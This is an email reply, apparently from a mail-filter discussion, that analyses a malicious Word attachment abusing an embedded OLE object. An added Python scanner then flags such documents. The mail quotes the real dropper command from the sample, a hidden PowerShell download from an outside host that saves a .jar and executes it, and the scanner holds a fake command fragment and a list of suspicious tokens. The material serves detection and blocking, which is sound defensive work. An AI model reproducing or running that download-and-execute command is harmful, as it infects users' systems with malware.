On 7/5/19 4:25 PM, Hasan Ç. wrote:
> Sure, I sent you a bunch of malicious office attachments.
>

The only one of these that is a "real" office document is Siparis2.docx, and unfortunately it uses a new(ish) exploit technique. Instead of placing the code in a macro, the code is embedded in some other OLE object, and then the document itself is constructed to trick the user into clicking and running that object:

https://www.microsoft.com/security/blog/2016/06/14/wheres-the-macro-malware-author-are-now-using-ole-embedding-to-deliver-malicious-files/

https://securityriskadvisors.com/blog/the-return-of-ole-exploit-delivery-cve-2018-8174/

In your example, if you extract Siparis2.docx, you'll find two interesting files,

* '[Content_Types].xml'
* 'word/embeddings/oleObject1.bin'

The first one contains a bunch of XML and indicates that this document comes with an embedded OLE object,

<Types
xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="bin"
ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
...

The oleObject1.bin contains the actual exploit, if you scroll down:

--++++++-cmd|'/c powershell -executionpolicy bypass -W Hidden -command
"& { (new-object
System.Net.WebClient).DownloadFile(\"http://www.qyhhy.ml\" ,\"
%tmp%\\6uOyYF.jar\") }" & %tmp%\\6uOyYF.jar'!'C14'63

What all this means is:

1. Microsoft is still fucking stupid.
2. You won't be able to block these by blocking macros.

For these OLE exploits, I only have two ideas:

1. Block all OLE objects.
2. Allow OLE objects, and try to catch the bad ones.

The first option will probably cause a lot of false positives, but it should at least be doable -- for example, by scanning that XML file, and throwing a fit if anything has the oleObject content type.

The second option, as you've already discovered, doesn't work so great. You can put anything into an OLE object, so we're back at square one. Whenever you find a malicious OLE object, you have to submit it to the antivirus companies and wait for them to create a signature. For us, that means SaneSecurity and ClamAV, and ClamAV doesn't usually respond quickly. Nevertheless, you can submit them here:

https://www.clamav.net/reports/malware

I submitted the oleObject1.bin file above already.

As far as your other files (xls and csv) go... I'm not sure what to think about those. It looks like they contain junk, but I'm well aware that Excel will try to open them and probably do something stupid in the process. But without a copy of Excel and a death wish handy, I don't know how to troubleshoot further. (Again, you could always submit them to ClamAV and SaneSecurity.)
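The "block all OLE objects" option described in the mail can be implemented in a few lines: unzip the .docx, read [Content_Types].xml, and refuse the document if any Default or Override entry carries the oleObject content type or if anything sits under word/embeddings/. The script below is an added example and is not code from the original mail or from any mail filter; the minimal sample documents it builds are constructed inline, and the list of suspicious tokens it looks for inside embeddings (taken from the command line quoted above) is my own heuristic, not a signature from ClamAV or SaneSecurity.

```python
"""Flag .docx files that carry embedded OLE objects (added example, not from
the original mail). Checks [Content_Types].xml for the oleObject content type,
lists word/embeddings/*, and looks for command-line tokens in the embeddings.
The sample documents are constructed in memory; they are not real malware."""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET

OLE_CONTENT_TYPE = "application/vnd.openxmlformats-officedocument.oleObject"
# Tokens seen in the command line quoted in the mail; a heuristic, not a signature.
SUSPICIOUS_TOKENS = (b"powershell", b"-executionpolicy bypass", b"cmd|", b"DownloadFile")


def scan_docx(data: bytes) -> dict:
    """Return findings for a .docx given as raw bytes."""
    findings = {"ole_content_type": False, "embeddings": [], "suspicious": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if "[Content_Types].xml" in names:
            root = ET.fromstring(zf.read("[Content_Types].xml"))
            # Both <Default Extension=...> and <Override PartName=...> can declare it.
            for el in root:
                if el.get("ContentType") == OLE_CONTENT_TYPE:
                    findings["ole_content_type"] = True
        for name in names:
            if name.startswith("word/embeddings/"):
                findings["embeddings"].append(name)
                blob = zf.read(name).lower()
                hits = [t.decode() for t in SUSPICIOUS_TOKENS if t.lower() in blob]
                if hits:
                    findings["suspicious"].append((name, hits))
    return findings


def verdict(findings: dict) -> str:
    """Option 1 from the mail: any OLE object is enough to reject the file."""
    if findings["suspicious"]:
        return "malicious-looking OLE embedding"
    if findings["ole_content_type"] or findings["embeddings"]:
        return "contains OLE object (block or quarantine)"
    return "clean"


def build_sample(with_ole: bool) -> bytes:
    """Constructed minimal .docx for testing; NOT a real document or sample."""
    ct = ('<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
          '<Default Extension="xml" ContentType="application/xml"/>')
    if with_ole:
        ct += '<Default Extension="bin" ContentType="%s"/>' % OLE_CONTENT_TYPE
    ct += "</Types>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", ct)
        zf.writestr("word/document.xml", "<document/>")
        if with_ole:
            # Stand-in for oleObject1.bin: junk bytes around a command line fragment.
            zf.writestr("word/embeddings/oleObject1.bin",
                        b"\x00" * 64 + b"cmd|'/c powershell -W Hidden ...'" + b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    paths = sys.argv[1:]
    if not paths:
        # No files given: demonstrate on the constructed samples.
        for label, with_ole in (("plain.docx", False), ("with_ole.docx", True)):
            print(label, "->", verdict(scan_docx(build_sample(with_ole))))
    for path in paths:
        with open(path, "rb") as fh:
            f = scan_docx(fh.read())
        print(path, "->", verdict(f), f)
```

Run it with no arguments to see the two constructed samples classified, or pass real .docx paths. The content-type check alone is what the mail proposes and is cheap enough for a mail gateway; the token scan only adds a little precision for the specific trick shown here and will miss anything the attacker encodes differently, which is the "square one" problem the mail describes.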